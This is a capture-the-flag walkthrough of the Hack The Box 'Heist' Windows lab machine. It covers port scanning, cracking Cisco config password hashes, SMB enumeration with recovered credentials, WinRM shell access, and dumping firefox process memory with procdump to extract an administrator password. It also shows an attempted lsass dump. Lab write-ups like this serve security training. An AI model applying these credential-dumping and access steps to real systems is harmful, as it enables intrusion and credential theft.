Hack The Box: Heist Walkthrough

130n@calvinlai.com

Author: fkclai is a Certified Ethical Hacker, Penetration Tester, Auditor and a Tech Enthusiast with more than 5 years of experience in the field of Application Security. Contact Here

@27 Oct 2019

Acknowledgement:

The game cannot be completed without the support of my friends David Au and other member of CTF Playgroup Hong Kong & Macau        

Background:

Objective

Security Level: Easy

OS: Windows

Summary:

Penetrating Methodology:

Service Scanning

Enumeration

Exploitation

Getting Less Privilege Shell

Captured the flag

Walkthrough:

Target machine: 10.10.10.149

Attacking (Hacker) machine: 10.10.15.203

Hacking Process Part 0 – Service Scanning

The target machine IP is 10.10.10.149. Get a basic understanding the available services of the target machine using nmap aggressive scanning to all available ports.

0.1) Quick Pre-searching

nmap 10.10.10.149 -oN nmap-quick-heist.txt

nmap -p- 10.10.10.149

0.2) Details Analysis

nmap -sV -p 80,135,445 -A -oN nmap-htb-heist.txt 10.10.10.149

80/tcp  open  http          Microsoft IIS httpd 10.0

| http-cookie-flags:

|   /:

|     PHPSESSID:

|_      httponly flag not set

| http-methods:

|_  Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/10.0

| http-title: Support Login Page

|_Requested resource was login.php

135/tcp open  msrpc         Microsoft Windows RPC

445/tcp open  microsoft-ds?

5985/tcp  open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

|_http-server-header: Microsoft-HTTPAPI/2.0

|_http-title: Not Found

49668/tcp open  msrpc   Microsoft Windows RPC

Hacking Process Part 1 – Enumeration

1.1) Strategy 1 Check Hidden folder

Nikto -- no vulnerability can be abused to bypass authentication.

1.2) Strategy 2 Website Enumeration

Website enumeration is a standard practice. However, not much valuable information this time.

dirb http://10.10.10.149/attachments/ /usr/share/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt

1.3) Strategy 3 Examine the web page

Go to http://10.10.10.149. You will see “Login as guest”.

After login as guest, you will see the Support Admin has opened account for user Hazard.

On the forum, there is also a Cisco config file attached here.

The config file contains three password hashes

Cisco password 7 can be decoded in this link: http://www.ifm.net.nz/cookbooks/passwordcracker.html

        For Cisco enable secret, we can decrypt it by using john and rockyou wordlist in Kali

john --wordlist=rockyou.txt hash.txt

root@Kali:~/Desktop/Wordlist# john --show hash.txt

?:stealth1agent

1 password hash cracked, 0 left

-------------------------------

 The config file contains three password hashes. The decrypted passwords are as following:

password 7 0242114B0E143F015F5D1E161713=> $uperP@ssword

password 7 02375012182C1A1D751618034F36415408=> Q4)sJu\Y8qz*A3?d

Enable secret $1$pdQG$o8nrSzsGXeaduXrjlvKc91=> stealth1agent  

1.4) Strategy 4 SMB scanning by Metasploit

Not much valuable information is retrieved by this scanning

1.5) Strategy 5 Enumeration on Windows SMB

Look for smb vulnerabilities, but no exploitable vulnerabilities can be used

Use different tools to connect the Windows server and try different account/credential pairs. No exploitable share folder can be abused, but we confirm that password for user account Hazard is  stealth1agent

(a)Smbclient -L 10.10.10.149 -U Hazard%stealth1agent

(b)smbmap -H 10.10.10.149 -u Hazard -p stealth1agent

(c)rpcclient -H 10.10.10.149 -U Hazard -p stealth1agent

We can use rpcclient to open an authenticated SMB session to a target machine

Then, we perform enum4linux with a valid Windows user account.

enum4linux -v -a -S -U -d -u Hazard -p stealth1agent 10.10.10.149

Grep the enum result with keyword “Local”. We discover many Local accounts on the target Windows server.

Use smbclient to try different account and credential pairs, we confirm that another valid account-credential pair is Chase:Q4)sJu\Y8qz*A3?d . We have also checked there are no exploitable share folder for user Chase.

Hacking Process Part 2 – Exploitation

2.1) Strategy 1 Metalsploit Windows SMB

Crackmapexec smb 10.10.10.149 -u Hazard -p ‘stealth1agent’

Shell is not gained by crackmapexec

2.2) Strategy 2 WindowsRM

In service scanning, Server Port 5985 tcp is opened. After study, we find it is the infamous WindowsRM service.

  1. Test with Metasploit module. However, we cannot gain shell access

  1. Secondly, we have used below ruby script and successfully gain low privilege shell access.

Hacking Process Part 3 – Getting Low Privilege Access

3.1) Strategy 1 Windows Directory Traversal

At Desktop, we have found the user.txt (user-flag) and a todo.txt (not much valuable )

Confirm that there is only one admin account: administrators

3.2) Strategy 2 Process Dump by procdump.exe

Start a SimpleHTTP server on Kali

python -m SimpleHTTPServer 80

We download procdump.exe from Kali to the target machine. Even though there is exception, the executable can be uploaded successfully.

However, the process dump of Isass.exe is rejected.

cmd.exe /c "C:\Users\Chase\Desktop\procdump.exe" -ma lsass.exe -accepteula "C:\Users\Chase\Desktop\lsass.dmp"

Inspect the other running process on the target

powershell.exe “get-process”

There are many processes. After several trials, we discover user password in process firefox. It sounds reasonable, since the web browser has the highest chance to store user password.

Detail steps are as following:

PS > cmd.exe /c "C:\Users\Chase\Desktop\procdump.exe" -ma 5400 -accepteula "dmp"

Remark: 5400 is the pid of firefox at that time

   

Then, we use powershell to extract the password

Get-ChildItem -Path "C:\Users\Chase\Desktop\1928firefox.dmp" -Recurse -File | Select-String login

FirefoxMOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=����xC:\Program

Hacking Process Part 4 - Privilege Escalation

At the end of Part 3, we have obtained a new password.

Probably it is credential password of  Administrator. Lets try for it !

Modify the winrm_shell.rb with administrator and the new password

We successfully gain the root shell and own the machine!!!!

Conclusion...

Reference Link

Guide to SMB Enumeration

https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/